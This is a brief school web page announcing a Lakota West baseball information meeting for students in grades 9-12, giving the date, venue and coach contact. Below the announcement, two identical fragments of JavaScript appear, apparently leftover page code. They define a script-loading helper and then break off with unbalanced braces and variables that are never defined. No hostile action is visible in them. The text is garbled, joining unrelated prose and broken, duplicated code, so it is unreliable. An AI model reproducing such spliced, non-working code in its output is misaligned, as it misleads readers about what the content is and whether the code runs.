Baseball
Mark Your Calendars: Lakota West Baseball Information Meeting!
There will be a Lakota West Baseball information meeting for students currently in grades 9-12 who are interested in playing baseball. Athletes interested in playing in the spring should attend this meeting and have a parent attend to get workout schedules and information about the upcoming season. The meeting will be on Thursday, September 2nd in the West Freshman Auditorium starting at 6:00 PM. Please contact Coach Gschwind at bradley.gschwind@lakotaonline.com for any additional information.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();